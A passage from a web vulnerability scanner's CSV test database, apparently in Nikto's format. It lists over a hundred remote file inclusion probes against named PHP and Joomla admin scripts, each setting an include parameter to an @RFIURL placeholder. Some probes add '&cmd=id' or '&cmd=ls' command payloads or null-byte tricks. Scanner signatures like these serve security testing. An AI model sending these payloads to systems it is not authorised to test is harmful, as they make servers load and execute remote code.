list.\",\"\",\"\"\n\"004077\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/admin/admin.php?site_url=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004078\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/admin/admin_forgotten_password.php?root_folder_path=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004079\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/admin/admin_news_bot.php?root_path=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004080\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/admin/admin_topic_action_logging.php?setmodules=attach&phpbb_root_path=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004081\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/admin/admin_topic_action_logging.php?setmodules=pagestart&phpbb_root_path=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004082\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/admin/admin_users.php?phpbb_root_path=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004083\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/admin/auth.php?xcart_dir=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004084\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/admin/auth.php?xcart_dir=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004085\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/admin/auth/secure.php?cfgProgDir=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004086\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/admin/autoprompter.php?CONFIG[BASE_PATH]=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004087\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/admin/bin/patch.php?INSTALL_FOLDER=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004088\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/admin/catagory.php?language=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004089\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/admin/classes/pear/OLE/PPS.php?homedir=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004090\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/admin/classes/pear/OLE/PPS/File.php?homedir=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004091\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/admin/classes/pear/OLE/PPS/Root.php?homedir=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004092\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/admin/classes/pear/Spreadsheet/Excel/Writer.php?homedir=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004093\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/admin/classes/pear/Spreadsheet/Excel/Writer/BIFFwriter.php?homedir=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004094\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/admin/classes/pear/Spreadsheet/Excel/Writer/Format.php?homedir=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004095\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/admin/classes/pear/Spreadsheet/Excel/Writer/Parser.php?homedir=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004096\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/admin/classes/pear/Spreadsheet/Excel/Writer/Workbook.php?homedir=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004097\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/admin/classes/pear/Spreadsheet/Excel/Writer/Worksheet.php?homedir=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004098\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/admin/code/index.php?load_page=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004099\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/admin/comment.php?config[installdir]=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004100\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/admin/common-menu.php?CONF[local_path]=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004101\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/admin/components/com_fm/fm.install.php?lm_absolute_path=../../../&install_dir=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004102\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/admin/config_settings.tpl.php?include_path=@RFIURL?&cmd=id\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004103\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/admin/directory.php?config[installdir]=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004104\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/admin/doeditconfig.php?thispath=../includes&config[path]=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004105\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/admin/frontpage_right.php?loadadminpage=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004106\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/admin/header.php?loc=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004107\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/admin/inc/add.php?format_menue=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004108\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/admin/inc/change_action.php?format_menue=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004109\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/admin/include/common.php?commonIncludePath=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004110\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/admin/include/header.php?repertoire=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004111\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/admin/include/header.php?repertoire=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004112\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/admin/include/lib.module.php?mod_root=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004113\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/admin/includes/admin_header.php?level=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004114\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/admin/includes/admin_header.php?level=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004115\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/admin/includes/author_panel_header.php?level=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004116\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/admin/includes/author_panel_header.php?level=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004117\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/admin/includes/header.php?bypass_installed=1&secure_page_path=@RFIURL%00\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004118\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/admin/includes/spaw/spaw_control.class.php?spaw_root=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004119\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/admin/index.php?path_to_script=@RFIURL?&cmd=ls\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004120\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/admin/index.php?pg=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004121\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/admin/index.php?xtrphome=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004122\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/admin/index_sitios.php?_VIEW=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004123\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/admin/lib_action_step.php?GLOBALS[CLASS_PATH]=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004124\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/admin/login.php?absolute_path=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004125\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/admin/news.admin.php?path_to_script=@RFIURL?&cmd=ls\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004126\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/admin/news.php?language=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004127\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/admin/plugins/Online_Users/main.php?GLOBALS[PT_Config][dir][data]=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004128\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/admin/sendmsg.php?config[installdir]=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004129\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/admin/setup/level2.php?dir=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004130\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/admin/system/config/conf-activation.php?site_path=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004131\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/admin/system/include.php?skindir=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004132\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/admin/system/include.php?start=1&skindir=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004133\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/admin/system/menu/item.php?site_path=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004134\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/admin/system/modules/conf_modules.php?site_path=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004135\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/admin/templates/template_thumbnail.php?thumb_template=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004136\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/admin/testing/tests/0004_init_urls.php?init_path=@RFIURL?&\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004137\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/admin/themes.php?config[installdir]=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004138\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/admin/tools/utf8conversion/index.php?path=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004139\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/admin/user_user.php?language=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004140\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/admincp/auth/checklogin.php?cfgProgDir=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004141\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/admincp/auth/secure.php?cfgProgDir=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004142\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/adminhead.php?path[docroot]=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004143\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/admini/admin.php?INC=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004144\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/admini/index.php?INC=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004145\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/administrator/admin.php?site_absolute_path=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004146\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/administrator/components/com_bayesiannaivefilter/lang.php?mosConfig_absolute_path=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004147\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/administrator/components/com_chronocontact/excelwriter/PPS.php?mosConfig_absolute_path=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004148\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/administrator/components/com_chronocontact/excelwriter/PPS/File.php?mosConfig_absolute_path=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004149\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004150\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/administrator/components/com_chronocontact/excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004151\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/administrator/components/com_chronocontact/excelwriter/Writer/Format.php?mosConfig_absolute_path=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004152\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/administrator/components/com_chronocontact/excelwriter/Writer/Workbook.php?mosConfig_absolute_path=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004153\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004154\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/administrator/components/com_clickheat/Recly/Clickheat/Cache.php?GLOBALS[mosConfig_absolute_path]=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004155\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/administrator/components/com_clickheat/Recly/Clickheat/Clickheat_Heatmap.php?GLOBALS[mosConfig_absolute_path]=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004156\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/administrator/components/com_clickheat/Recly/common/GlobalVariables.php?GLOBALS[mosConfig_absolute_path]=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004157\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/administrator/components/com_clickheat/includes/heatmap/_main.php?mosConfig_absolute_path=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004158\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/administrator/components/com_clickheat/includes/heatmap/main.php?mosConfig_absolute_path=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004159\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/administrator/components/com_clickheat/includes/overview/main.php?mosConfig_absolute_path=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004160\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/administrator/components/com_clickheat/install.clickheat.php?GLOBALS[mosConfig_absolute_path]=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004161\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/administrator/components/com_color/admin.color.php?mosConfig_live_site=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004162\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/administrator/components/com_color/admin.color.php?mosConfig_live_site=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004163\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/administrator/components/com_competitions/includes/competitions/add.php?GLOBALS[mosConfig_absolute_path]=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004164\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/administrator/components/com_competitions/includes/competitions/competitions.php?GLOBALS[mosConfig_absolute_path]=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004165\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/administrator/components/com_competitions/includes/settings/settings.php?mosConfig_absolute_path=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004166\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004167\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004168\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/administrator/components/com_dadamail/config.dadamail.php?GLOBALS[mosConfig_absolute_path]=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004169\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004170\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/administrator/components/com_events/admin.events.php?mosConfig_absolute_path=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004171\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004172\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/administrator/components/com_extended_registration/admin.extended_registration.php?mosConfig_absolute_path=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004173\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/administrator/components/com_feederator/includes/tmsp/add_tmsp.php?mosConfig_absolute_path=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004174\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/administrator/components/com_feederator/includes/tmsp/edit_tmsp.php?mosConfig_absolute_path=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004175\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/administrator/components/com_feederator/includes/tmsp/subscription.php?GLOBALS[mosConfig_absolute_path]=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004176\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/administrator/components/com_feederator/includes/tmsp/tmsp.php?mosConfig_absolute_path=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004177\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/administrator/components/com_googlebase/admin.googlebase.php?mosConfig_absolute_path=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004178\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004179\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/administrator/components/com_jcs/view/add.php?mosConfig_absolute_path=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004180\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/administrator/components/com_jcs/view/history.php?mosConfig_absolute_path=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004181\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004182\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/administrator/components/com_jcs/views/list.sub.html.php?mosConfig_absolute_path=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004183\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/administrator/components/com_jcs/views/list.user.sub.html.php?mosConfig_absolute_path=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004184\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004185\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/administrator/components/com_jim/install.jim.php?mosConfig_absolute_path=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004186\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004187\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI 